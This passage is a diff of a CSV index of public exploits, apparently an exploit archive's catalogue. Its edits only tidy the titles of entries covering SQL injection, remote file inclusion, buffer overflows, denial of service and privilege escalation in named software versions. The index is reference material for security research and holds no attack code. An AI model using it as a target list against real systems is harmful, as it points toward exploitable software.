Finisterre",linux,remote,0 @@ -1152,7 +1152,7 @@ id,file,description,date,author,platform,type,port 1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 - Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143 1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 - (APPE) Remote Overflow Exploit (Metasploit)",2005-12-20,redsand,windows,remote,21 -1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated)",2006-02-20,DarkFig,php,webapps,0 +1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (2)",2006-02-20,DarkFig,php,webapps,0 1383,platforms/php/webapps/1383.txt,"phpBB <= 2.0.18 - Remote XSS Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0 1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - (rating) Parameter Remote SQL Injection Exploit",2005-12-23,krasza,php,webapps,0 1387,platforms/php/webapps/1387.php,"Dev Web Management System <= 1.5 - (cat) Remote SQL Injection Exploit",2005-12-24,rgod,php,webapps,0 @@ -1210,7 +1210,7 @@ id,file,description,date,author,platform,type,port 1462,platforms/windows/remote/1462.cpp,"Sami FTP Server 2.0.1 - Remote Buffer Overflow Exploit (cpp)",2006-01-31,HolyGhost,windows,remote,21 1463,platforms/windows/remote/1463.pm,"SoftiaCom WMailserver 1.0 - SMTP Remote Buffer Overflow Exploit (Metasploit)",2006-02-01,y0,windows,remote,21 1464,platforms/hardware/dos/1464.c,"Arescom NetDSL-1000 - (telnetd) Remote Denial of Service Exploit",2006-02-02,"Fabian Ramirez",hardware,dos,0 -1465,platforms/windows/local/1465.c,"Microsoft Windows - ACLs Local Privilege Escalation Exploit (Updated)",2006-02-12,"Andres Tarasco",windows,local,0 +1465,platforms/windows/local/1465.c,"Microsoft Windows - ACLs Local Privilege Escalation Exploit (2)",2006-02-12,"Andres Tarasco",windows,local,0 1466,platforms/windows/remote/1466.pl,"eXchange POP3 5.0.050203 - (rcpt to) Remote Buffer Overflow Exploit",2006-02-03,"securma massine",windows,remote,25 1467,platforms/php/webapps/1467.php,"LoudBlog <= 0.4 - (path) Arbitrary Remote Inclusion Exploit",2006-02-03,rgod,php,webapps,0 1468,platforms/php/webapps/1468.php,"Clever Copy <= 3.0 Admin Auth Details / Remote SQL Injection Exploit",2006-02-04,rgod,php,webapps,0 @@ -1934,7 +1934,7 @@ id,file,description,date,author,platform,type,port 2237,platforms/multiple/dos/2237.sh,"Apache < 1.3.37 / 2.0.59 / 2.2.3 - (mod_rewrite) Remote Overflow PoC",2006-08-21,"Jacobo Avariento",multiple,dos,0 2238,platforms/windows/dos/2238.html,"Microsoft Internet Explorer Multiple COM Object Color Property DoS",2006-08-21,nop,windows,dos,0 2239,platforms/php/webapps/2239.txt,"Empire CMS <= 3.7 - (checklevel.php) Remote File Include",2006-08-22,"Bob Linuson",php,webapps,0 -2240,platforms/php/webapps/2240.txt,"HPE <= 1.0 - (HPEinc) Remote File Include Vulnerabilities (updated)",2006-08-22,"the master",php,webapps,0 +2240,platforms/php/webapps/2240.txt,"HPE <= 1.0 - (HPEinc) Remote File Include Vulnerabilities (2)",2006-08-22,"the master",php,webapps,0 2241,platforms/solaris/local/2241.c,"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0 2242,platforms/solaris/local/2242.sh,"Solaris 8 / 9 - (/usr/ucb/ps) Local Information Leak Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0 2243,platforms/php/webapps/2243.php,"Simple Machines Forum <= 1.1 rc2 Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0 @@ -2215,7 +2215,7 @@ id,file,description,date,author,platform,type,port 2519,platforms/php/webapps/2519.txt,"Minichat 6.0 - (ftag.php) Remote File Include",2006-10-11,Zickox,php,webapps,0 2520,platforms/php/webapps/2520.txt,"Softerra PHP Developer Library <= 1.5.3 - File Include Vulnerabilities",2006-10-12,MP,php,webapps,0 2521,platforms/php/webapps/2521.txt,"Download-Engine <= 1.4.2 - (spaw) Remote File Include",2006-10-12,v1per-haCker,php,webapps,0 -2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 [RC2] - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0 +2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 RC2 - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0 2523,platforms/windows/dos/2523.pl,"Microsoft Office 2003 PPT Local Buffer Overflow PoC",2006-10-12,Nanika,windows,dos,0 2524,platforms/bsd/dos/2524.c,"FreeBSD 5.4 / 6.0 - (ptrace PT_LWPINFO) Local Denial of Service Exploit",2006-10-12,kokanin,bsd,dos,0 2525,platforms/php/webapps/2525.pl,"phpBB Insert User Mod <= 0.1.2 - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0 @@ -2385,7 +2385,7 @@ id,file,description,date,author,platform,type,port 2692,platforms/php/webapps/2692.txt,"GEPI <= 1.4.0 gestion/savebackup.php Remote File Include",2006-10-31,"Sumit Siddharth",php,webapps,0 2693,platforms/php/webapps/2693.txt,"PwsPHP <= 1.1 - (themes/fin.php) Remote File Include Vulnerablity",2006-10-31,3l3ctric-Cracker,php,webapps,0 2694,platforms/php/webapps/2694.php,"T.G.S. CMS <= 0.1.7 - (logout.php) Remote SQL Injection Exploit",2006-10-31,Kacper,php,webapps,0 -2695,platforms/multiple/dos/2695.html,"Mozilla Firefox <= 1.5.0.7/ 2.0 - (createRange) Remote DoS Exploit",2006-10-31,"Gotfault Security",multiple,dos,0 +2695,platforms/multiple/dos/2695.html,"Mozilla Firefox <= 1.5.0.7/2.0 - (createRange) Remote DoS Exploit",2006-10-31,"Gotfault Security",multiple,dos,0 2696,platforms/php/webapps/2696.php,"Invision Power Board <= 2.1.7 - (Debug) Remote Password Change Exploit",2006-11-01,Rapigator,php,webapps,0 2697,platforms/php/webapps/2697.php,"Innovate Portal <= 2.0 - (acp.php) Remote Code Execution Exploit",2006-11-01,Kacper,php,webapps,0 2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - (admin/configuration.inc.php) Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0 @@ -3017,7 +3017,7 @@ id,file,description,date,author,platform,type,port 3347,platforms/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - (CPU consumption) Remote DoS Exploit",2007-02-20,Marsu,windows,dos,0 3348,platforms/php/webapps/3348.txt,"SendStudio <= 2004.14 - (ROOTDIR) Remote File Inclusion",2007-02-20,K-159,php,webapps,0 3349,platforms/windows/local/3349.c,"News Bin Pro 5.33 - (.NBI) Local Buffer Overflow Exploit",2007-02-21,Marsu,windows,local,0 -3350,platforms/windows/dos/3350.html,"BrowseDialog Class (ccrpbds6.dll) Multiple Methods DoS Exploit",2007-02-21,shinnai,windows,dos,0 +3350,platforms/windows/dos/3350.html,"BrowseDialog Class - (ccrpbds6.dll) Multiple Methods DoS Exploit",2007-02-21,shinnai,windows,dos,0 3351,platforms/php/webapps/3351.pl,"webSPELL <= 4.01.02 - (topic) Remote SQL Injection Exploit",2007-02-21,DNX,php,webapps,0 3352,platforms/php/webapps/3352.php,"Connectix Boards <= 0.7 - (p_skin) Multiple Vulnerabilities",2007-02-21,DarkFig,php,webapps,0 3353,platforms/php/webapps/3353.txt,"DBImageGallery 1.2.2 - (donsimg_base_path) RFI Vulnerabilities",2007-02-21,Denven,php,webapps,0 @@ -3073,14 +3073,14 @@ id,file,description,date,author,platform,type,port 3404,platforms/multiple/dos/3404.php,"PHP wddx_deserialize() String Append Crash Exploit",2007-03-04,"Stefan Esser",multiple,dos,0 3405,platforms/multiple/remote/3405.txt,"PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS",2007-03-04,"Stefan Esser",multiple,remote,0 3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - (eintrag.php sqllog) Remote File Include Exploit",2007-03-04,bd0rk,php,webapps,0 -3407,platforms/multiple/dos/3407.c,"Asterisk <= 1.2.15 - / 1.4.0 pre-auth Remote Denial of Service Exploit",2007-03-04,fbffff,multiple,dos,0 +3407,platforms/multiple/dos/3407.c,"Asterisk <= 1.2.15 / 1.4.0 - pre-auth Remote Denial of Service Exploit",2007-03-04,fbffff,multiple,dos,0 3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - (subcat.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 - (view_profile.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - (postingdetails.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 3411,platforms/php/webapps/3411.pl,"AJ Forum 1.0 - (topic_title.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0 3412,platforms/cgi/webapps/3412.txt,"RRDBrowse <= 1.6 - Remote Arbitrary File Disclosure",2007-03-04,"Sebastian Wolfgarten",cgi,webapps,0 -3413,platforms/multiple/local/3413.php,"PHP < 4.4.5 - / 5.2.1 php_binary Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 -3414,platforms/multiple/local/3414.php,"PHP < 4.4.5 - / 5.2.1 WDDX Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 +3413,platforms/multiple/local/3413.php,"PHP < 4.4.5 - / 5.2.1 - php_binary Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 +3414,platforms/multiple/local/3414.php,"PHP < 4.4.5 - / 5.2.1 - WDDX Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 3415,platforms/linux/dos/3415.html,"Konqueror 3.5.5 - (JavaScript Read of FTP Iframe) DoS Exploit",2007-03-05,mark,linux,dos,0 3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 - (lcnt) Remote SQL Injection Exploit",2007-03-05,ajann,php,webapps,0 3417,platforms/windows/local/3417.php,"PHP <= 4.4.6 - mssql_[p]connect() Local Buffer Overflow Exploit",2007-03-05,rgod,windows,local,0 @@ -3162,7 +3162,7 @@ id,file,description,date,author,platform,type,port 3496,platforms/php/webapps/3496.php,"Php-Stats <= 0.1.9.1b (PC-REMOTE-ADDR) SQL Injection Exploit",2007-03-16,rgod,php,webapps,0 3497,platforms/php/webapps/3497.php,"Php-Stats <= 0.1.9.1b (ip) Remote SQL Injection Exploit",2007-03-16,rgod,php,webapps,0 3498,platforms/php/webapps/3498.txt,"Creative Files 1.2 - (kommentare.php) Remote SQL Injection",2007-03-16,"Mehmet Ince",php,webapps,0 -3499,platforms/linux/local/3499.php,"PHP <= 4.4.6 - / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit",2007-03-16,"Stefan Esser",linux,local,0 +3499,platforms/linux/local/3499.php,"PHP <= 4.4.6 / 5.2.1 - array_user_key_compare() ZVAL dtor Local Exploit",2007-03-16,"Stefan Esser",linux,local,0 3500,platforms/php/webapps/3500.htm,"Particle Blogger <= 1.2.0 - (post.php postid) Remote SQL Injection Exploit",2007-03-16,WiLdBoY,php,webapps,0 3501,platforms/php/webapps/3501.txt,"PHP DB Designer <= 1.02 - Remote File Include Vulnerabilities",2007-03-16,GoLd_M,php,webapps,0 3502,platforms/php/webapps/3502.php,"Php-Stats <= 0.1.9.1b (php-stats-options.php) admin 2 exec() eExploit",2007-03-17,rgod,php,webapps,0 @@ -3187,7 +3187,7 @@ id,file,description,date,author,platform,type,port 3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 - Local File Inclusion Exploit (Windows)",2007-03-19,bd0rk,php,webapps,0 3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 - GLOBALS[tplname] Local File Inclusion Exploit (Windows)",2007-03-20,GoLd_M,php,webapps,0 3524,platforms/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha - (htmltonuke.php) RFI",2007-03-20,"Cold Zero",php,webapps,0 -3525,platforms/linux/local/3525.php,"PHP <= 4.4.6 - / 5.2.1 ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 +3525,platforms/linux/local/3525.php,"PHP <= 4.4.6 / 5.2.1 - ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 - (SIP INVITE) Remote Denial of Service Exploit",2007-03-20,MADYNES,hardware,dos,0 3527,platforms/windows/dos/3527.pl,"Mercur IMAPD 5.00.14 - Remote Denial of Service Exploit (Win32)",2007-03-20,mu-b,windows,dos,0 3528,platforms/php/webapps/3528.pl,"phpRaid < 3.0.7 - (rss.php phpraid_dir) Remote File Inclusion Exploit",2007-03-20,"Cold Zero",php,webapps,0 @@ -3227,13 +3227,13 @@ id,file,description,date,author,platform,type,port 3563,platforms/php/webapps/3563.txt,"ttCMS <= 4 - (ez_sql.php lib_path) Remote File Inclusion",2007-03-24,Kacper,php,webapps,0 3564,platforms/php/webapps/3564.pl,"Joomla Component Car Manager <= 1.1 - Remote SQL Injection Exploit",2007-03-24,ajann,php,webapps,0 3565,platforms/php/webapps/3565.pl,"Joomla Component RWCards <= 2.4.3 - Remote SQL Injection Exploit",2007-03-24,ajann,php,webapps,0 -3566,platforms/multiple/dos/3566.pl,"Asterisk <= 1.2.16 - / 1.4.1 SIP INVITE Remote Denial of Service Exploit",2007-03-25,MADYNES,multiple,dos,0 +3566,platforms/multiple/dos/3566.pl,"Asterisk <= 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service Exploit",2007-03-25,MADYNES,multiple,dos,0 3567,platforms/php/webapps/3567.pl,"Mambo Module Flatmenu <= 1.07 - Remote File Include Exploit",2007-03-25,"Cold Zero",php,webapps,0 3568,platforms/php/webapps/3568.txt,"Free Image Hosting <= 2.0 - (AD_BODY_TEMP) Remote File Inclusion Vulnerabilities",2007-03-25,Crackers_Child,php,webapps,0 3569,platforms/php/webapps/3569.pl,"PBlang <= 4.66z Remote Create Admin Exploit",2007-03-25,Hessam-x,php,webapps,0 3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - (USER) Remote Buffer Overlow Exploit",2007-03-25,niXel,windows,remote,21 -3571,platforms/linux/local/3571.php,"PHP < 4.4.5 - / 5.2.1 _SESSION unset() Local Exploit",2007-03-25,"Stefan Esser",linux,local,0 -3572,platforms/linux/local/3572.php,"PHP < 4.4.5 - / 5.2.1 _SESSION Deserialization Overwrite Exploit",2007-03-25,"Stefan Esser",linux,local,0 +3571,platforms/linux/local/3571.php,"PHP < 4.4.5 - / 5.2.1 - _SESSION unset() Local Exploit",2007-03-25,"Stefan Esser",linux,local,0 +3572,platforms/linux/local/3572.php,"PHP < 4.4.5 - / 5.2.1 - _SESSION Deserialization Overwrite Exploit",2007-03-25,"Stefan Esser",linux,local,0 3574,platforms/php/webapps/3574.pl,"PBlang 4.66z Remote Code Execution Exploit",2007-03-25,Hessam-x,php,webapps,0 3575,platforms/windows/remote/3575.cpp,"Frontbase <= 4.2.7 - Remote Buffer Overflow Exploit (windows)",2007-03-25,Heretic2,windows,remote,0 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL phpDOC - Local Buffer Overflow Exploit",2007-03-25,rgod,windows,local,0 @@ -3246,7 +3246,7 @@ id,file,description,date,author,platform,type,port 3583,platforms/php/webapps/3583.txt,"C-Arbre <= 0.6PR7 - (root_path) Remote File Inclusion",2007-03-26,K-159,php,webapps,0 3584,platforms/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN - SQL Injection Exploit (2)",2007-03-27,bunker,multiple,remote,0 3585,platforms/multiple/remote/3585.pl,"Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit",2007-03-27,bunker,multiple,remote,0 -3586,platforms/linux/dos/3586.php,"PHP 4.4.5 - / 4.4.6 session_decode() Double Free Exploit PoC",2007-03-27,"Stefan Esser",linux,dos,0 +3586,platforms/linux/dos/3586.php,"PHP 4.4.5 / 4.4.6 - session_decode() Double Free Exploit PoC",2007-03-27,"Stefan Esser",linux,dos,0 3587,platforms/linux/local/3587.c,"Linux Kernel <= 2.6.20 with DCCP Support - Memory Disclosure Exploit (1)",2007-03-27,"Robert Swiecki",linux,local,0 3588,platforms/php/webapps/3588.pl,"XOOPS module Articles <= 1.02 - (print.php id) SQL Injection Exploit",2007-03-27,WiLdBoY,php,webapps,0 3589,platforms/windows/remote/3589.pm,"NaviCOPA Web Server 2.01 - Remote Buffer Overflow Exploit (Metasploit)",2007-03-27,skillTube,windows,remote,80 @@ -3263,11 +3263,11 @@ id,file,description,date,author,platform,type,port 3600,platforms/php/webapps/3600.txt,"Softerra Time-Assistant <= 6.2 - (inc_dir) Remote File Inclusion",2007-03-29,K-159,php,webapps,0 3601,platforms/php/webapps/3601.pl,"sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit",2007-03-29,GoLd_M,php,webapps,0 3602,platforms/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 - (username) Remote Denial of Service Exploit",2007-03-29,"Winny Thomas",windows,dos,0 -3603,platforms/php/webapps/3603.pl,"XOOPS Module MyAds Bug Fix <= 2.04jp (index.php) SQL Injection Exploit",2007-03-29,ajann,php,webapps,0 +3603,platforms/php/webapps/3603.pl,"XOOPS Module MyAds Bug Fix <= 2.04jp - (index.php) SQL Injection Exploit",2007-03-29,ajann,php,webapps,0 3604,platforms/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 - (Mediasvr.exe) Remote Code Exploit",2007-03-29,Shirkdog,windows,remote,111 3605,platforms/php/webapps/3605.php,"Picture-Engine <= 1.2.0 - (wall.php cat) Remote SQL Injection Exploit",2007-03-29,Kacper,php,webapps,0 3606,platforms/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 DoS Hang / Crash Exploit",2007-03-29,shinnai,multiple,dos,0 -3607,platforms/php/webapps/3607.txt,"Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities",2007-03-29,"ThE dE@Th",php,webapps,0 +3607,platforms/php/webapps/3607.txt,"Kaqoo Auction - (install_root) Multiple Remote File Include Vulnerabilities",2007-03-29,"ThE dE@Th",php,webapps,0 3608,platforms/php/webapps/3608.txt,"Advanced Login <= 0.7 - (root) Remote File Inclusion",2007-03-29,Bithedz,php,webapps,0 3609,platforms/linux/remote/3609.py,"Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)",2007-03-30,"Winny Thomas",linux,remote,0 3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - (dvdtools.ocx) Remote Buffer Overflow Exploit",2007-03-30,"Umesh Wanve",windows,remote,0 @@ -3843,7 +3843,7 @@ id,file,description,date,author,platform,type,port 4193,platforms/php/webapps/4193.txt,"QuickEStore <= 8.2 - (insertorder.cfm) Remote SQL Injection",2007-07-18,meoconx,php,webapps,0 4194,platforms/php/webapps/4194.txt,"Joomla Component Expose <= RC35 - Remote File Upload",2007-07-18,"Cold Zero",php,webapps,0 4195,platforms/php/webapps/4195.txt,"BBS E-Market (postscript.php p_mode) Remote File Inclusion",2007-07-18,mozi,php,webapps,0 -4196,platforms/multiple/dos/4196.c,"Asterisk < 1.2.22 - / 1.4.8 / 2.2.1 chan_skinny Remote Denial of Service",2007-07-18,fbffff,multiple,dos,0 +4196,platforms/multiple/dos/4196.c,"Asterisk < 1.2.22 / 1.4.8 / 2.2.1 - chan_skinny Remote Denial of Service",2007-07-18,fbffff,multiple,dos,0 4197,platforms/php/webapps/4197.txt,"phpBB Module SupaNav 1.0.0 - (link_main.php) RFI",2007-07-18,bd0rk,php,webapps,0 4198,platforms/asp/webapps/4198.txt,"A-shop <= 0.70 - Remote File Deletion",2007-07-18,Timq,asp,webapps,0 4199,platforms/php/webapps/4199.txt,"Md-Pro <= 1.0.8x (Topics topicid) Remote SQL Injection",2007-07-18,anonymous,php,webapps,0 @@ -3998,7 +3998,7 @@ id,file,description,date,author,platform,type,port 4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection Exploit",2007-08-31,k1tk4t,php,webapps,0 4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - Remote SQL Injection Exploit",2007-09-01,Silentz,php,webapps,0 4351,platforms/windows/remote/4351.html,"Yahoo! Messenger (YVerInfo.dll <= 2007.8.27.1) ActiveX BoF Exploit",2007-09-01,minhbq,windows,remote,0 -4352,platforms/php/webapps/4352.txt,"Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities",2007-09-02,bius,php,webapps,0 +4352,platforms/php/webapps/4352.txt,"Weblogicnet - (files_dir) Multiple Remote File Inclusion Vulnerabilities",2007-09-02,bius,php,webapps,0 4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - (error_view.php ID) Remote SQL Injection",2007-09-02,k1tk4t,php,webapps,0 4354,platforms/windows/local/4354.py,"Virtual DJ 5.0 - (m3u File) Local Buffer OverFlow Exploit",2007-09-02,0x58,windows,local,0 4355,platforms/windows/local/4355.php,"OTSTurntables 1.00 - (m3u File) Local Buffer Overflow Exploit",2007-09-02,0x58,windows,local,0 @@ -4038,7 +4038,7 @@ id,file,description,date,author,platform,type,port 4389,platforms/windows/remote/4389.html,"Ultra Crypto Component (CryptoX.dll <= 2.0) Remote BoF Exploit",2007-09-10,shinnai,windows,remote,0 4390,platforms/php/webapps/4390.txt,"AuraCMS 2.1 - Remote File Attachment / LFI Vulnerabilities",2007-09-10,k1tk4t,php,webapps,0 4391,platforms/multiple/remote/4391.c,"Lighttpd <= 1.4.16 FastCGI Header Overflow Remote Exploit",2007-09-10,"Mattias Bengtsson",multiple,remote,0 -4392,platforms/multiple/local/4392.txt,"PHP <= 4.4.7 - / 5.2.3 MySQL/MySQLi Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0 +4392,platforms/multiple/local/4392.txt,"PHP <= 4.4.7 / 5.2.3 - MySQL/MySQLi Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0 4393,platforms/windows/remote/4393.html,"Microsoft Visual Studio 6.0 - (PDWizard.ocx) Remote Command Execution",2007-09-11,shinnai,windows,remote,0 4394,platforms/windows/remote/4394.html,"Microsoft Visual Studio 6.0 - (VBTOVSI.DLL 1.0.0.0) File Overwrite Exploit",2007-09-11,shinnai,windows,remote,0 4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - (root_path) Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0 @@ -4098,7 +4098,7 @@ id,file,description,date,author,platform,type,port 4450,platforms/windows/remote/4450.py,"Xitami Web Server 2.5 - (If-Modified-Since) Remote BoF Exploit (0Day)",2007-09-24,h07,windows,remote,80 4451,platforms/php/webapps/4451.txt,"DFD Cart 1.1 - Multiple Remote File Inclusion Vulnerabilities",2007-09-24,BiNgZa,php,webapps,0 4452,platforms/windows/remote/4452.html,"AskJeeves Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow Exploit",2007-09-24,"Joey Mengele",windows,remote,0 -4453,platforms/windows/remote/4453.html,"EB Design Pty Ltd (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites",2007-09-24,shinnai,windows,remote,0 +4453,platforms/windows/remote/4453.html,"EB Design Pty Ltd - (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites",2007-09-24,shinnai,windows,remote,0 4454,platforms/php/webapps/4454.txt,"sk.log <= 0.5.3 - (skin_url) Remote File Inclusion",2007-09-24,w0cker,php,webapps,0 4455,platforms/windows/remote/4455.pl,"Motorola Timbuktu Pro <= 8.6.5 File Deletion/Creation Exploit",2008-03-11,titon,windows,remote,0 4456,platforms/php/webapps/4456.txt,"FrontAccounting 1.13 - Remote File Inclusion Vulnerabilities",2007-09-26,kezzap66345,php,webapps,0 @@ -4596,7 +4596,7 @@ id,file,description,date,author,platform,type,port 4952,platforms/php/webapps/4952.txt,"boastMachine <= 3.1 - (mail.php id) SQL Injection",2008-01-21,"Virangar Security",php,webapps,0 4953,platforms/php/webapps/4953.txt,"OZJournals 2.1.1 - (id) File Disclosure",2008-01-21,shinmai,php,webapps,0 4954,platforms/php/webapps/4954.txt,"IDM-OS 1.0 - (download.php fileName) File Disclosure",2008-01-21,MhZ91,php,webapps,0 -4955,platforms/php/webapps/4955.txt,"Lama Software (14.12.2007) Multiple Remote File Inclusion Vulnerabilities",2008-01-21,QTRinux,php,webapps,0 +4955,platforms/php/webapps/4955.txt,"Lama Software 14.12.2007 - Multiple Remote File Inclusion Vulnerabilities",2008-01-21,QTRinux,php,webapps,0 4956,platforms/php/webapps/4956.txt,"AlstraSoft Forum Pay Per Post Exchange 2.0 - SQL Injection",2008-01-21,t0pP8uZz,php,webapps,0 4957,platforms/php/webapps/4957.txt,"MoinMoin 1.5.x MOIND_ID cookie Bug Remote Exploit",2008-01-21,nonroot,php,webapps,0 4958,platforms/php/webapps/4958.txt,"aflog 1.01 comments.php XSS / SQL Injection",2008-01-22,shinmai,php,webapps,0 @@ -4786,7 +4786,7 @@ id,file,description,date,author,platform,type,port 5146,platforms/php/webapps/5146.txt,"Joomla Component com_clasifier (cat_id) SQL Injection",2008-02-18,S@BUN,php,webapps,0 5147,platforms/php/webapps/5147.txt,"PHP-Nuke Module books SQL (cid) Remote SQL Injection",2008-02-18,S@BUN,php,webapps,0 5148,platforms/php/webapps/5148.txt,"XOOPS Module myTopics (articleid) Remote SQL Injection",2008-02-18,S@BUN,php,webapps,0 -5149,platforms/php/webapps/5149.txt,"sCssBoard (pwnpack) Multiple Versions Remote Exploit",2008-02-18,Inphex,php,webapps,0 +5149,platforms/php/webapps/5149.txt,"sCssBoard - (pwnpack) Multiple Versions Remote Exploit",2008-02-18,Inphex,php,webapps,0 5150,platforms/hardware/remote/5150.txt,"Thecus N5200Pro NAS Server Control Panel - RFI",2008-02-18,Crackers_Child,hardware,remote,0 5151,platforms/osx/dos/5151.pl,"Apple iPhoto 4.0.3 DPAP Server Denial of Service Exploit",2008-02-18,"David Wharton",osx,dos,0 5152,platforms/multiple/dos/5152.sh,"X.Org xorg-server <= 1.1.1-48.13 - Probe for Files Exploit PoC",2008-02-19,vl4dZ,multiple,dos,0 @@ -5028,7 +5028,7 @@ id,file,description,date,author,platform,type,port 5392,platforms/php/webapps/5392.php,"LinPHA <= 1.3.3 - (maps plugin) Remote Command Execution Exploit",2008-04-07,EgiX,php,webapps,0 5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - (root) Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0 5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 - (viewsource.php) Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0 -5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0 +5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0 5396,platforms/windows/dos/5396.txt,"hp openview nnm 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0 5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - (NeffyLauncher.dll) Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0 5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport FileTransfer ActiveX BoF Exploit",2008-04-07,"Patrick Webster",windows,remote,0 @@ -5196,7 +5196,7 @@ id,file,description,date,author,platform,type,port 5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 iso_recv_msg() Integer Underflow PoC",2008-05-08,"Guido Landi",linux,dos,0 5562,platforms/php/webapps/5562.py,"RunCMS <= 1.6.1 - (msg_image) SQL Injection Exploit",2008-05-08,The:Paradox,php,webapps,0 5563,platforms/windows/remote/5563.pl,"TFTP Server for Windows 1.4 - ST Remote BSS Overflow Exploit",2008-05-08,tixxDZ,windows,remote,69 -5564,platforms/asp/webapps/5564.txt,"Shader TV (Beta) Multiple Remote SQL Injection Vulnerabilities",2008-05-08,U238,asp,webapps,0 +5564,platforms/asp/webapps/5564.txt,"Shader TV (Beta) - Multiple Remote SQL Injection Vulnerabilities",2008-05-08,U238,asp,webapps,0 5565,platforms/php/webapps/5565.pl,"vShare Youtube Clone 2.6 - (tid) Remote SQL Injection",2008-05-08,Saime,php,webapps,0 5566,platforms/php/webapps/5566.txt,"SazCart 1.5.1 - Multiple Remote File Inclusion Vulnerabilities",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 5567,platforms/php/webapps/5567.txt,"Cyberfolio 7.12 - (rep) Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0 @@ -5560,7 +5560,7 @@ id,file,description,date,author,platform,type,port 5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - (page.php pid) Remote SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 5938,platforms/php/webapps/5938.php,"PHPmotion <= 2.0 - (update_profile.php) Remote Shell Upload Exploit",2008-06-25,EgiX,php,webapps,0 5939,platforms/php/webapps/5939.txt,"Joomla Component netinvoice 1.2.0 SP1 SQL Injection",2008-06-25,His0k4,php,webapps,0 -5940,platforms/php/webapps/5940.txt,"Keller Web Admin CMS 0.94 Pro Local File 